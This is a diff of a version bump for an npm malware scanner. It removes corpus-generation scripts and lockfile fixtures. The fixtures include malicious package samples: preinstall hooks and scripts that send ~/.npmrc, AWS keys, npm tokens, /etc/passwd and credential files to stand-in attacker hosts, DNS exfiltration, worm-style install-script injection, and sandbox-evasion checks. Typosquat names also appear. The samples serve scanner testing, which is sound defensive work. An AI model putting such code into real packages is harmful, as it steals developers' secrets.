@lateos/npm-scan 0.18.2 → 1.0.0

package/scripts/download-corpus.js

@@ -1,30 +0,0 @@
-import fetch from 'node-fetch';
-import { writeFileSync, existsSync } from 'fs';
-
-const TOP_PKGS = [
-  'lodash', 'chalk', 'react', 'axios', 'express',
-  'tslib', 'commander', 'typescript', 'vue', 'next',
-  'yargs', 'debug', 'moment', 'uuid', 'semver',
-  'rimraf', 'eslint', 'prettier', 'webpack', 'babel-core',
-  'underscore', 'request', 'async', 'cheerio', 'bluebird',
-  'jest', 'mocha', 'dotenv', 'glob', 'node-fetch',
-  'minimist', 'body-parser', 'cors', 'helmet', 'jsonwebtoken',
-  'socket.io', 'redis', 'mongoose', 'sequelize', 'pg',
-  'passport', 'nodemailer', 'multer', 'bcrypt', 'winston',
-  'luxon', 'dayjs', 'class-validator', 'rxjs', 'redux'
-];
-
-for (const pkg of TOP_PKGS) {
-  const file = `tests/corpus/clean/${pkg}.tgz`;
-  if (existsSync(file)) { console.log(`SKIP ${pkg}`); continue; }
-  try {
-    const res = await fetch(`https://registry.npmjs.org/${pkg}/latest`);
-    const meta = await res.json();
-    const tarRes = await fetch(meta.dist.tarball);
-    const buf = Buffer.from(await tarRes.arrayBuffer());
-    writeFileSync(file, buf);
-    console.log(`OK ${pkg} (${(buf.length/1024).toFixed(0)}KB)`);
-  } catch (e) {
-    console.log(`FAIL ${pkg}: ${e.message}`);
-  }
-}

package/scripts/gen-mal-corpus.js

@@ -1,35 +0,0 @@
-import { execSync } from 'child_process';
-import { writeFileSync, mkdirSync, rmSync } from 'fs';
-import { join } from 'path';
-
-const BASE = '/tmp/npm-scan-mal';
-
-const MALS = [
-  { name: 'shai-hulud', pkg: { scripts: { preinstall: 'curl -d @~/.npmrc https://c2.evil.com/x' } }, js: 'eval(atob("Y3VybCBodHRwOi8vYzIuZXZpbC5jb20="))' },
-  { name: 'mal-dns-exfil', pkg: {}, js: 'dns.resolve(key + ".exfil.com", (err, addr) => {})' },
-  { name: 'mal-tamper-1', pkg: { name: 'lodash', repository: { url: 'https://github.com/attacker/lodash-mirror.git' } }, js: 'module.exports = { malicious: true }' },
-  { name: 'mal-tamper-2', pkg: { name: 'react', repository: { url: 'https://github.com/attacker/react-evil.git' } }, js: '// Source: https://evil.com/react/original.js\nmodule.exports = {}' },
-  { name: 'mal-dormant-1', pkg: {}, js: 'if (process.env.NODE_ENV === "production") { eval(atob("Y29uc29sZS5sb2coJ2V2aWwnKQ==")) }' },
-  { name: 'mal-dormant-2', pkg: {}, js: 'if (new Date() > new Date("2026-06-01")) { require("./payload.js") }' },
-  { name: 'mal-dormant-3', pkg: {}, js: 'if (process.env.CI) { process.exit(0) } else { /* malicious */ require("./exploit.js") }' },
-  { name: 'mal-evasion-1', pkg: {}, js: 'if (os.hostname().includes("docker") || os.hostname().includes("sandbox")) { process.exit(0) }' },
-  { name: 'mal-evasion-2', pkg: {}, js: 'if (process.argv.join(" ").includes("inspect")) { debugger; /* stop analysis */ }' },
-  { name: 'mal-evasion-3', pkg: {}, js: 'try { throw new Error(); } catch(e) { if (e.stack.includes("sandbox")) { process.exit(0) } }' },
-  { name: 'mal-prop-1', pkg: { name: '@evil/worm' }, js: 'execSync("npm install ./worm-pkg"); execSync("npm link")' },
-  { name: 'mal-prop-2', pkg: {}, js: 'fs.writeFileSync("../lodash/node_modules/worm/index.js", "module.exports = { compromised: true }")' },
-  { name: 'mal-prop-3', pkg: { name: 'worm-pkg' }, js: `const pj = require('../express/package.json'); pj.scripts.install = 'node worm.js'; fs.writeFileSync('../express/package.json', JSON.stringify(pj))` },
-];
-
-for (const mal of MALS) {
-  const dir = join(BASE, mal.name);
-  rmSync(dir, { recursive: true, force: true });
-  mkdirSync(dir, { recursive: true });
-  writeFileSync(join(dir, 'package.json'), JSON.stringify({ name: mal.name, version: '1.0.0', ...mal.pkg }));
-  if (mal.js) writeFileSync(join(dir, 'index.js'), mal.js);
-  execSync(`tar czf tests/corpus/malicious/${mal.name}.tgz -C ${BASE} ${mal.name}`);
-  console.log(`OK ${mal.name}`);
-}
-
-console.log('All mal corpus entries generated.');
-console.log('Total:', MALS.length);
-console.log('New entries: tamper-1, tamper-2, dormant-1, dormant-2, dormant-3, evasion-1, evasion-2, evasion-3');

package/scripts/generate-campaign-fixtures.js

@@ -1,170 +0,0 @@
-import { mkdtempSync, mkdirSync, writeFileSync, rmSync } from 'fs';
-import { execSync } from 'child_process';
-import { tmpdir } from 'os';
-import { join } from 'path';
-import { fileURLToPath } from 'url';
-import { dirname } from 'path';
-
-const __dirname = dirname(fileURLToPath(import.meta.url));
-const CORPUS_DIR = join(__dirname, '..', 'tests', 'corpus', 'malicious');
-
-const TOP_TYPOS = [
-  'reacct', 'expres', 'axiox', 'chlak', 'vuue', 'typescrip',
-  'momnet', 'uuuid', 'commnder', 'debuge', 'semverr', 'underscoree',
-  'requesst', 'asycn',
-];
-
-const BINARY_NAMES = ['bun', 'deno', 'go', 'rustc', 'python'];
-
-function writeFile(filePath, content) {
-  writeFileSync(filePath, content, 'utf8');
-}
-
-function createElfBinary(size = 4096) {
-  const buf = Buffer.alloc(size, 0);
-  buf[0] = 0x7f;
-  buf[1] = 0x45;
-  buf[2] = 0x4c;
-  buf[3] = 0x46;
-  buf[4] = 2;
-  buf[5] = 1;
-  buf[6] = 1;
-  buf[7] = 0;
-  return buf;
-}
-
-function createPeBinary(size = 4096) {
-  const buf = Buffer.alloc(size, 0);
-  buf[0] = 0x4d;
-  buf[1] = 0x5a;
-  return buf;
-}
-
-function buildTarball(dir, tmpParent) {
-  const tgzPath = join(CORPUS_DIR, `${dir}.tgz`);
-  execSync(`tar czf "${tgzPath}" -C "${tmpParent}" "${dir}"`, { stdio: 'pipe', shell: 'powershell' });
-}
-
-function createCampaign1Package(n) {
-  const dir = `campaign-1-${String(n).padStart(3, '0')}`;
-  const pkgJson = {
-    name: `vulnerable-package-${n}`,
-    version: '99.0.0',
-    description: 'Campaign 1 test fixture',
-    repository: { url: 'https://github.enterprise.internal/org/repo' },
-    homepage: 'https://jira.internal/browse/PROJ-123',
-    bugs: { url: 'https://docs.internal/issues' },
-    scripts: {
-      postinstall: 'node -e "eval(Buffer.from(\'dmFyIHggPSAx\' ,\'base64\').toString())"',
-    },
-  };
-
-  const distIndexJs = `(function() {
-  const os = require('os');
-  const env = process.env;
-  const profile = {
-    hostname: os.hostname(),
-    platform: os.platform(),
-    arch: os.arch(),
-    env: { AWS_ACCESS_KEY_ID: env.AWS_ACCESS_KEY_ID }
-  };
-  console.log('[RECON]', JSON.stringify(profile));
-})();`;
-
-  const tmpParent = mkdtempSync(join(tmpdir(), 'camp1-'));
-  const pkgDir = join(tmpParent, dir);
-  mkdirSync(join(pkgDir, 'dist'), { recursive: true });
-  writeFile(join(pkgDir, 'package.json'), JSON.stringify(pkgJson, null, 2));
-  writeFile(join(pkgDir, 'dist', 'index.js'), distIndexJs);
-
-  buildTarball(dir, tmpParent);
-  rmSync(tmpParent, { recursive: true, force: true });
-  console.log(`  Created ${dir}.tgz`);
-}
-
-function createCampaign2Package(n) {
-  const dir = `campaign-2-${String(n).padStart(3, '0')}`;
-  const typoName = TOP_TYPOS[(n - 1) % TOP_TYPOS.length];
-  const binName = BINARY_NAMES[(n - 1) % BINARY_NAMES.length];
-
-  const pkgJson = {
-    name: typoName,
-    version: '1.0.0',
-    description: 'Test fixture',
-  };
-
-  const distIndexJs = `const fs = require('fs');
-const { execSync } = require('child_process');
-const awsKey = process.env.AWS_ACCESS_KEY_ID;
-const npmToken = process.env.NODE_AUTH_TOKEN;
-const data = fs.readFileSync('/etc/passwd', 'utf8');
-if (awsKey || npmToken) {
-  fetch('https://attacker.com/creds', {
-    method: 'POST',
-    body: JSON.stringify({ awsKey, npmToken, data })
-  });
-}`;
-
-  const tmpParent = mkdtempSync(join(tmpdir(), 'camp2-'));
-  const pkgDir = join(tmpParent, dir);
-  mkdirSync(join(pkgDir, 'dist'), { recursive: true });
-  mkdirSync(join(pkgDir, 'bin'), { recursive: true });
-  writeFile(join(pkgDir, 'package.json'), JSON.stringify(pkgJson, null, 2));
-  writeFile(join(pkgDir, 'dist', 'index.js'), distIndexJs);
-
-  writeFileSync(join(pkgDir, 'bin', binName), createElfBinary(32768));
-  writeFileSync(join(pkgDir, 'bin', `${binName}.exe`), createPeBinary(32768));
-
-  buildTarball(dir, tmpParent);
-  rmSync(tmpParent, { recursive: true, force: true });
-  console.log(`  Created ${dir}.tgz (typo: ${typoName}, binary: ${binName})`);
-}
-
-function createCampaign3Package() {
-  const dir = 'campaign-3-infostealer';
-
-  const pkgJson = {
-    name: 'mouse5212-super-formatter',
-    version: '1.0.0',
-    description: 'Super formatter',
-  };
-
-  const distIndexJs = `const fs = require('fs');
-const { execSync } = require('child_process');
-const secretFiles = ['package.json', '.env', '.npmrc', '.aws/credentials'];
-for (const file of secretFiles) {
-  try {
-    const content = fs.readFileSync(process.env.HOME + '/' + file, 'utf8');
-    const ghToken = 'ghp_stub1234567890abcdefghijklmnopqr';
-    const exfilUrl = 'https://api.github.com/repos/attacker/stolen-secrets/contents/data.json';
-    execSync('curl -X PUT "' + exfilUrl + '" -H "Authorization: token ' + ghToken + '" -d ' + JSON.stringify(content));
-  } catch (e) {
-  }
-}`;
-
-  const tmpParent = mkdtempSync(join(tmpdir(), 'camp3-'));
-  const pkgDir = join(tmpParent, dir);
-  mkdirSync(join(pkgDir, 'dist'), { recursive: true });
-  writeFile(join(pkgDir, 'package.json'), JSON.stringify(pkgJson, null, 2));
-  writeFile(join(pkgDir, 'dist', 'index.js'), distIndexJs);
-
-  buildTarball(dir, tmpParent);
-  rmSync(tmpParent, { recursive: true, force: true });
-  console.log(`  Created ${dir}.tgz`);
-}
-
-// ─── Generate All Campaigns ─────────────────────────────────────────
-console.log('Generating Campaign 1 (33 packages)...');
-for (let i = 1; i <= 33; i++) {
-  createCampaign1Package(i);
-}
-
-console.log('Generating Campaign 2 (14 packages)...');
-for (let i = 1; i <= 14; i++) {
-  createCampaign2Package(i);
-}
-
-console.log('Generating Campaign 3 (1 package)...');
-createCampaign3Package();
-
-console.log('\nAll 48 campaign tarballs generated successfully!');

package/src/config/top-5000.json

@@ -1,87 +0,0 @@
-[
-  "lodash", "react", "express", "axios", "chalk", "vue", "typescript", "moment", "uuid", "commander",
-  "debug", "semver", "underscore", "request", "async", "cheerio", "bluebird", "jest", "mocha", "dotenv",
-  "glob", "minimist", "body-parser", "cors", "helmet", "jsonwebtoken", "socket.io", "redis", "mongoose", "sequelize",
-  "pg", "passport", "nodemailer", "multer", "bcrypt", "winston", "luxon", "dayjs", "rxjs", "redux",
-  "react-dom", "next", "nuxt", "angular", "fastify", "hono", "koa", "connect", "vite", "rollup",
-  "esbuild", "babel-core", "ramda", "node-fetch", "got", "superagent", "prisma", "typeorm", "vitest", "ava",
-  "prettier", "eslint", "stylelint", "ws", "rimraf", "minimatch", "fs-extra", "webpack", "parcel", "gatsby",
-  "tslib", "core-js", "regenerator-runtime", "buffer", "class-validator", "class-transformer", "reflect-metadata", "zone.js", "graphql", "apollo-server",
-  "express-graphql", "type-graphql", "nexus", "prisma-binding", "graphql-yoga", "apollo-client", "urql", "relay-runtime", "subscriptions-transport-ws", "graphql-subscriptions",
-  "graphql-tools", "graphql-tag", "graphql-upload", "dataloader", "envalid", "joi", "yup", "zod", "superstruct", "io-ts",
-  "runtypes", "ow", "ajv", "validator", "validatorjs", "validate.js", "indicative", "computed-types", "typebox", "typia",
-  "sinon", "chai", "should", "expect", "proxyquire", "nock", "nyc", "istanbul", "c8", "tap",
-  "ava", "uvu", "tape", "benchmark", "microbench", "node-fetch", "cross-fetch", "isomorphic-fetch", "ky", "got",
-  "undici", "needle", "phin", "wreck", "bent", "make-fetch-happen", "http-proxy-agent", "https-proxy-agent", "socks-proxy-agent", "agent-base",
-  "express-session", "cookie-parser", "cookie-session", "csurf", "lusca", "helmet-csp", "hpp", "rate-limiter-flexible", "express-rate-limit", "express-brute",
-  "passport-local", "passport-jwt", "passport-oauth2", "passport-http", "passport-google-oauth", "passport-facebook", "passport-github", "passport-twitter", "passport-linkedin", "passport-apple",
-  "bcryptjs", "argon2", "scrypt", "password-hash", "hasha", "pbkdf2", "node-forge", "crypto-js", "crypto-random-string", "nanoid",
-  "jsonwebtoken", "json5", "fast-json-stable-stringify", "flatted", "serialize-javascript", "javascript-natural-sort", "json-stringify-safe", "json-stable-stringify", "json3", "json-parse-even-better-errors",
-  "morgan", "pino", "winston-cloudwatch", "log4js", "bunyan", "signale", "consola", "loglevel", "loglevelnext", "roarr",
-  "ora", "listr", "progress", "cli-progress", "cli-spinners", "log-symbols", "log-update", "figures", "ansi-styles", "supports-color",
-  "nodemon", "concurrently", "npm-run-all", "parallelshell", "shelljs", "execa", "cross-env", "env-cmd", "dotenv-safe", "dotenv-expand",
-  "pm2", "forever", "supervisor", "node-dev", "tsx", "ts-node", "ts-node-dev", "ts-jest", "ts-loader", "typescript-json-schema",
-  "eslint-config-airbnb", "eslint-config-prettier", "eslint-plugin-react", "eslint-plugin-vue", "eslint-plugin-import", "eslint-plugin-node", "eslint-plugin-promise", "eslint-plugin-standard", "eslint-plugin-jsx-a11y", "eslint-plugin-jest",
-  "prettier-eslint", "pretty-quick", "lint-staged", "husky", "lint-staged", "commitlint", "cz-conventional-changelog", "standard-version", "semantic-release", "release-it",
-  "webpack-cli", "webpack-dev-server", "webpack-merge", "webpack-node-externals", "css-loader", "style-loader", "sass-loader", "less-loader", "postcss-loader", "file-loader",
-  "url-loader", "html-webpack-plugin", "mini-css-extract-plugin", "terser-webpack-plugin", "optimize-css-assets-webpack-plugin", "clean-webpack-plugin", "copy-webpack-plugin", "define-plugin", "provide-plugin", "ignore-plugin",
-  "electron", "electron-builder", "electron-packager", "electron-forge", "nativefier", "nw", "nw-builder", "tauri", "tauri-cli", "wry",
-  "puppeteer", "playwright", "playwright-core", "cypress", "selenium-webdriver", "webdriverio", "nightwatch", "testcafe", "protractor", "karma",
-  "sharp", "node-canvas", "canvas", "jimp", "gm", "lwip", "pngjs", "jpeg-js", "gif-js", "qrcode",
-  "ffmpeg-static", "fluent-ffmpeg", "ffprobe-static", "musicmetadata", "node-id3", "sox-audio", "wav", "speaker", "node-lame", "audiobuffer-to-wav",
-  "chromium", "chrome-launcher", "chrome-aws-lambda", "puppeteer-extra", "puppeteer-extra-plugin-stealth", "playwright-extra", "puppeteer-cluster", "puppeteer-core", "playwright-firefox", "playwright-webkit",
-  "react-scripts", "create-react-app", "react-dev-utils", "react-error-overlay", "react-refresh", "react-hot-loader", "react-fast-refresh", "react-app-polyfill", "react-app-rewired", "customize-cra",
-  "next", "gatsby", "gatsby-cli", "gatsby-plugin-*", "gridsome", "remix", "remix-run", "blitz", "blitzjs", "redwoodjs",
-  "@angular/cli", "@angular/core", "@angular/common", "@angular/compiler", "@angular/platform-browser", "@angular/platform-browser-dynamic", "@angular/forms", "@angular/router", "@angular/http", "@angular/animations",
-  "@angular-devkit/core", "@angular-devkit/schematics", "@angular-devkit/build-angular", "@angular-devkit/build-optimizer", "@ngrx/store", "@ngrx/effects", "@ngrx/entity", "@ngrx/store-devtools", "@angular/material", "@angular/cdk",
-  "vue-router", "vuex", "vuepress", "vue-cli", "vue-loader", "vue-template-compiler", "vue-server-renderer", "vite", "vitest", "pinia",
-  "nuxt", "svelte", "sveltekit", "sapper", "solid-js", "solid-start", "preact", "inferno", "lit", "lit-html",
-  "htm", "hono", "alpinejs", "stimulus", "turbolinks", "hotwired-turbo", "hotwired-stimulus", "unpoly", "petite-vue", "qwik",
-  "express", "fastify", "hapi", "restify", "micro", "polka", "tinyhttp", "sails", "adonis-framework", "loopback",
-  "feathers", "nest", "routing-controllers", "typedi", "inversify", "awilix", "awilix-express", "express-di", "injection-js", "tsyringe",
-  "typeorm", "prisma", "drizzle-orm", "knex", "kysely", "better-sqlite3", "sql.js", "sequelize", "bookshelf", "objection",
-  "mongoose", "mongodb", "mongodb-memory-server", "mongoose-sequence", "mongoskin", "monk", "realm", "tingodb", "lokijs", "nedb",
-  "redis", "ioredis", "redis-commander", "connect-redis", "session-file-store", "connect-mongo", "connect-memcached", "couchbase", "memcached", "leveldown",
-  "mysql", "mysql2", "mariasql", "pg-promise", "pg-native", "pg-pool", "sqlite3", "sql.js", "better-sqlite3", "sqlcipher",
-  "socket.io", "ws", "uws", "faye-websocket", "sockjs", "socket.io-client", "socket.io-redis", "socket.io-emitter", "socket.io-adapter", "primus",
-  "amqplib", "kafkajs", "node-rdkafka", "rhea", "nats", "nats-hemera", "mqtt", "mqemitter", "mosca", "aedes",
-  "bull", "bullmq", "bee-queue", "kue", "agenda", "node-cron", "cron", "node-schedule", "later", "bree",
-  "handlebars", "mustache", "ejs", "pug", "nunjucks", "liquidjs", "eta", "twig", "marko", "dustjs-linkedin",
-  "jsdom", "cheerio", "htmlparser2", "node-html-parser", "parse5", "linkedom", "xmldom", "sax", "node-expat", "libxmljs",
-  "marked", "remarkable", "showdown", "markdown-it", "commonmark", "remark", "remark-parse", "remark-stringify", "unified", "rehype",
-  "dayjs", "date-fns", "luxon", "moment-timezone", "timeago.js", "ms", "pretty-ms", "pretty-hrtime", "strftime", "dateformat",
-  "dotenv", "config", "nconf", "convict", "env-var", "envschema", "envalid", "properties-reader", "ini", "toml",
-  "colors", "chalk", "kleur", "colorette", "picocolors", "nanocolors", "ansi-colors", "color-string", "color-convert", "color-name",
-  "fs-extra", "graceful-fs", "make-dir", "klaw", "klaw-sync", "readdirp", "watchpack", "chokidar", "fsevents", "micromatch",
-  "globby", "fast-glob", "picomatch", "minimatch", "brace-expansion", "ignore", "anymatch", "is-glob", "is-extglob", "normalize-path",
-  "archiver", "unzipper", "decompress", "tar", "tar-fs", "tar-stream", "yauzl", "yazl", "adm-zip", "extract-zip",
-  "cross-spawn", "spawn-command", "tree-kill", "signal-exit", "ps-tree", "pidtree", "pidusage", "process-exists", "find-process", "fkill",
-  "which", "find-up", "locate-path", "pkg-dir", "resolve-from", "import-fresh", "resolve", "resolve-cwd", "pkg-up", "global-prefix",
-  "cosmiconfig", "lilconfig", "load-json-file", "parse-json", "json-parse-even-better-errors", "json5", "strip-json-comments", "comment-json", "jsonc-parser", "hjson",
-  "zod", "joi", "yup", "superstruct", "io-ts", "runtypes", "ow", "typebox", "typia", "valibot",
-  "inquirer", "enquirer", "prompts", "readline-sync", "read", "co-prompt", "cli-interact", "listr2", "node-prompt", "password-prompt",
-  "yargs", "yargs-parser", "meow", "arg", "getopts", "mri", "sade", "cac", "clipanion", "command-line-args",
-  "ora", "nanospinner", "cli-spinners", "listr", "progress", "cli-progress", "log-update", "log-symbols", "spinnies", "elegant-spinner",
-  "boxen", "window-size", "cli-table", "cli-table3", "easy-table", "columnify", "wordwrap", "wrap-ansi", "string-width", "strip-ansi",
-  "http-errors", "http-status-codes", "statuses", "boom", "http-assert", "http-response-object", "http-errors", "http-status", "status-code", "http-code",
-  "express", "koa", "koa-router", "koa-body", "koa-static", "koa-send", "koa-compress", "koa-logger", "koa-cors", "koa-session",
-  "axios", "superagent", "got", "node-fetch", "cross-fetch", "isomorphic-fetch", "ky", "ky-universal", "make-fetch-happen", "undici",
-  "lodash", "ramda", "lodash-es", "lodash.merge", "lodash.get", "lodash.set", "lodash.clonedeep", "lodash.isequal", "lodash.pick", "lodash.omit",
-  "defu", "merge-options", "deepmerge", "assign-deep", "deep-assign", "defaults-deep", "clone-deep", "merge-deep2", "merge-descriptors", "utils-merge",
-  "uuid", "nanoid", "cuid", "ulid", "bson", "objectid", "shortid", "hyperid", "flake-idgen", "snowflake-id",
-  "express", "passport", "bcrypt", "jsonwebtoken", "helmet", "cors", "express-rate-limit", "express-session", "cookie-parser", "csurf",
-  "next-auth", "passport", "passport-jwt", "passport-local", "keycloak-connect", "oauth2orize", "grant", "openid-client", "node-oidc-provider", "iron-session",
-  "lodash", "rxjs", "immer", "immutable", "seamless-immutable", "dot-prop", "object-path", "selectn", "rfdc", "clone",
-  "react-router", "react-router-dom", "reach-router", "wouter", "raviger", "navigation-react", "router5", "universal-router", "redux-router", "connected-react-router",
-  "redux", "redux-toolkit", "mobx", "mobx-react-lite", "recoil", "jotai", "zustand", "valtio", "xstate", "effector",
-  "react-query", "tanstack-query", "swr", "apollo-client", "urql", "relay-runtime", "react-apollo", "graphql-request", "rtk-query", "redux-observable",
-  "react-hook-form", "formik", "react-final-form", "redux-form", "uniforms", "react-jsonschema-form", "informed", "react-form", "formily", "vest",
-  "d3", "chart.js", "echarts", "highcharts", "plotly.js", "recharts", "victory", "nivo", "visx", "billboard.js",
-  "three", "babylonjs", "phaser", "pixi.js", "playcanvas", "aframe", "cannon-es", "ammo.js", "oimo", "matter-js",
-  "leaflet", "openlayers", "mapbox-gl", "cesium", "deck.gl", "luma.gl", "turf", "geolib", "geojson", "proj4",
-  "i18next", "react-i18next", "polyglot", "i18n", "i18n-js", "formatjs", "lingui", "react-intl", "react-intl-universal", "fbt",
-  "pdfkit", "pdf-lib", "pdfmake", "pdfjs", "jspdf", "pdf2json", "pdf-parse", "pdf2pic", "html-pdf", "puppeteer",
-  "exceljs", "xlsx", "csv-parse", "csv-stringify", "csvtojson", "csv-parser", "papaparse", "json2csv", "csv2json", "csv-writer",
-  "mongoist", "mongojs", "mongodb-memory-server", "mongodb-memory-server-core", "mongotop", "mongostat", "mongorestore", "mongodump", "mongo-hacker", "mongoplayground",
-  "json2typescript", "ts-json-serializer", "class-transformer", "autobind-decorator", "reflect-metadata", "typed-mock", "ts-mockito", "jest-mock-extended", "type-mock", "typemoq"
-]

package/test/fixtures/lockfiles/npm-lock.json

@@ -1,69 +0,0 @@
-{
-  "name": "test-project",
-  "version": "1.0.0",
-  "lockfileVersion": 3,
-  "packages": {
-    "": {
-      "name": "test-project",
-      "version": "1.0.0",
-      "dependencies": {
-        "lodash": "^4.17.21",
-        "axios": "^1.6.0"
-      },
-      "devDependencies": {
-        "@babel/core": "^7.23.0"
-      }
-    },
-    "node_modules/lodash": {
-      "name": "lodash",
-      "version": "4.17.21",
-      "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz",
-      "integrity": "sha512-v2kDEeDAnj4p1hhL6Ogrgu4BSWwg8cD2fRIouDAiqwu+iNl1IvyMex9jG9j8OpNp1zntnv/headququbit",
-      "dependencies": {}
-    },
-    "node_modules/axios": {
-      "name": "axios",
-      "version": "1.6.8",
-      "resolved": "https://registry.npmjs.org/axios/-/axios-1.6.8.tgz",
-      "integrity": "sha512-j2xvyqwsdd456789abcdef",
-      "dependencies": {
-        "form-data": "4.0.0",
-        "proxy-from-env": "1.1.0"
-      }
-    },
-    "node_modules/axios/node_modules/form-data": {
-      "version": "4.0.0",
-      "resolved": "https://registry.npmjs.org/form-data/-/form-data-4.0.0.tgz",
-      "integrity": "sha512-444567890123456"
-    },
-    "node_modules/@babel/core": {
-      "name": "@babel/core",
-      "version": "7.23.9",
-      "resolved": "https://registry.yarnpkg.com/@babel/core/-/core-7.23.9.tgz",
-      "integrity": "sha512-5q+M1iEJCOrGJs9NxzG3p3z7w2cJK/QuoRoI2pOJhtcNQjl9y7w6w4At5ZQHZdwqd+5N5G1lULu7I6pXVBw==",
-      "dev": true,
-      "dependencies": {
-        "@babel/generator": "^7.23.6",
-        "@babel/parser": "^7.23.9"
-      }
-    },
-    "node_modules/reakt": {
-      "name": "reakt",
-      "version": "18.2.0",
-      "resolved": "https://registry.yarnpkg.com/reakt/-/reakt-18.2.0.tgz",
-      "integrity": "sha-abcdabcd1234defghi",
-      "optional": true,
-      "dependencies": {}
-    },
-    "node_modules/express": {
-      "name": "express",
-      "version": "4.18.2",
-      "resolved": "https://registry.npmjs.org/express/-/express-4.18.2.tgz",
-      "integrity": "sha512-abcdabcd1234abcdefghi",
-      "dependencies": {
-        "accepts": "~1.3.8",
-        "body-parser": "1.20.2"
-      }
-    }
-  }
-}

package/test/fixtures/lockfiles/pnpm-lock.yaml

@@ -1,118 +0,0 @@
-lockfileVersion: "6.0"
-
-importers:
-  .:
-    dependencies:
-      lodash: "^4.17.21"
-      axios: "^1.6.0"
-    devDependencies:
-      "@babel/core": "^7.23.0"
-    optionalDependencies:
-      chalk: "^5.3.0"
-    peerDependencies:
-      react: ">=16"
-
-packages:
-  "/lodash@4.17.21":
-    resolution:
-      url: "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz"
-      sha512: X2xvyqwsdd456789abcdefghijk
-    dev: false
-    optional: false
-    dependencies: {}
-
-  "/axios@1.6.8":
-    resolution:
-      url: "https://registry.npmjs.org/axios/-/axios-1.6.8.tgz"
-      sha512: j2xvyqwsdd456789abcdef
-    dev: false
-    optional: false
-    dependencies:
-      form-data: "4.0.0"
-      proxy-from-env: "1.1.0"
-
-  "/reakt@18.2.0":
-    resolution:
-      url: "https://registry.yarnpkg.com/reakt/-/reakt-18.2.0.tgz"
-      sha512: abcdefghijk123456789
-    dev: false
-    optional: true
-    dependencies: []
-
-  "/@babel/core@7.23.9":
-    resolution:
-      url: "https://registry.yarnpkg.com/@babel/core/-/core-7.23.9.tgz"
-      sha512: k2yVyqwsdd456789abcdefghij
-    dev: true
-    optional: false
-    dependencies:
-      "@babel/generator": "7.23.6"
-      "@babel/parser": "7.23.9"
-      "@babel/traverse": "7.23.9"
-      "@babel/types": "7.23.9"
-      convert-source-map: "2.0.0"
-      debug: "4.1.0"
-      gensync: "1.0.0-beta.2"
-      json5: "2.2.3"
-      semver: "6.3.1"
-
-  "/@babel/generator@7.23.6":
-    resolution:
-      url: "https://registry.yarnpkg.com/@babel/generator/-/generator-7.23.6.tgz"
-      sha512: abcdefghijk12345678abcdef
-    dev: false
-    optional: false
-    dependencies:
-      "@babel/types": "7.23.6"
-      "@jridgewell/gen-mapping": "0.3.2"
-      "@jridgewell/trace-mapping": "0.3.17"
-      jsesc: "2.5.1"
-
-  "/expres@4.18.2":
-    resolution:
-      url: "https://registry.npmjs.org/expres-4.18.2.tgz"
-      sha512: abcdefghijk12345678
-    dev: false
-    optional: false
-    dependencies:
-      accepts: "1.3.8"
-      array-flatten: "1.1.1"
-      body-parser: "1.20.2"
-      content-disposition: "0.5.4"
-      content-type: "1.0.5"
-      cookie: "0.5.0"
-      cookie-signature: "1.0.6"
-      debug: "2.6.9"
-      depd: "2.0.0"
-      encodeurl: "1.0.2"
-      escape-html: "1.0.3"
-      etag: "1.8.1"
-      finalhandler: "1.2.0"
-      fresh: "0.5.2"
-      http-errors: "2.0.0"
-      merge-descriptors: "1.0.1"
-      methods: "1.1.2"
-      on-finished: "2.4.1"
-      parseurl: "1.3.3"
-      path-to-regexp: "0.1.7"
-      proxy-addr: "2.0.7"
-      qs: "6.11.0"
-      range-parser: "1.2.1"
-      safe-buffer: "5.2.1"
-      send: "0.18.0"
-      serve-static: "1.15.0"
-      setprototypeof: "1.2.0"
-      statuses: "2.0.1"
-      type-is: "1.6.18"
-      utils-merge: "1.0.1"
-      vary: "1.1.2"
-
-  "/my-scope-plugin@1.0.0":
-    resolution:
-      url: "https://registry.npmjs.org/my-scope-plugin/-/my-scope-plugin-1.0.0.tgz"
-      sha512: defghijk123456789abcdef
-    dev: false
-    optional: false
-    dependencies:
-      lodash: "4.17.21"
-      axios: "1.6.8"

package/test/fixtures/lockfiles/yarn.lock

@@ -1,104 +0,0 @@
-lodash@^4.17.21:
-  version "4.17.21"
-  resolved "https://registry.yarnpkg.com/lodash/-/lodash-4.17.21.tgz"
-  integrity sha512-Vythumb
-  dependencies: {}
-  dev false
-  optional true
-
-axios@^1.6.0:
-  version "1.6.8"
-  resolved "https://registry.yarnpkg.com/axios/-/axios-1.6.8.tgz"
-  integrity sha-j2xvyqwsdd456789abcdef
-  dependencies:
-    form-data "4.0.0"
-    proxy-from-env "1.1.0"
-  dev false
-  optional false
-
-"@babel/core@^7.23.0", "@babel/core@^7.23.9":
-  version "7.23.9"
-  resolved "https://registry.yarnpkg.com/@babel/core/-/core-7.23.9.tgz"
-  integrity sha512-5q+M1iEJCOrGJs9NxzG3p3z7w2cJK/QuoRoI2pOJhtcNQjl9y7w6w4At5ZQHZdwqd+5N5G1lULu7I6pXVBw==
-  dependencies:
-    "@babel/generator" "^7.23.6"
-    "@babel/parser" "^7.23.9"
-    "@babel/traverse" "^7.23.9"
-    "@babel/types" "^7.23.9"
-    convert-source-map "^2.0.0"
-    debug "^4.1.0"
-    gensync "^1.0.0-beta.2"
-    json5 "^2.2.3"
-    semver "^6.3.1"
-    rimraf "^3.0.2"
-  dev true
-  optional false
-
-"@babel/generator@^7.23.6", "@babel/generator@^7.23.9":
-  version "7.23.6"
-  resolved "https://registry.yarnpkg.com/@babel/generator/-/generator-7.23.6.tgz"
-  integrity sha512-56bfx9G1AJAFDl5QuK6t7MTCW3CBi7J8j+GxJJPvZ7L1f4P2FG8f9dBiH8Hg4U5Gcb6Bi4Y8DQ8x0j8b1QE8w==
-  dependencies:
-    "@babel/types" "^7.23.6"
-    "@jridgewell/gen-mapping" "^0.3.2"
-    "@jridgewell/trace-mapping" "^0.3.17"
-    jsesc "^2.5.1"
-  dev false
-  optional false
-
-reakt@^18.2.0:
-  version "18.2.0"
-  resolved "https://registry.yarnpkg.com/reakt/-/reakt-18.2.0.tgz"
-  integrity sha512-abcdabcd1234defghi
-  dependencies: []
-  dev false
-  optional true
-
-express@npm:expres@^4.18.2:
-  version "4.18.2"
-  resolved "https://registry.npmjs.org/expres-4.18.2.tgz"
-  integrity sha512-abcdabcd1234abcdefghi
-  dependencies:
-    accepts "~1.3.8"
-    array-flatten "1.1.1"
-    body-parser "1.20.2"
-    content-disposition "0.5.4"
-    content-type "~1.0.5"
-    cookie "0.5.0"
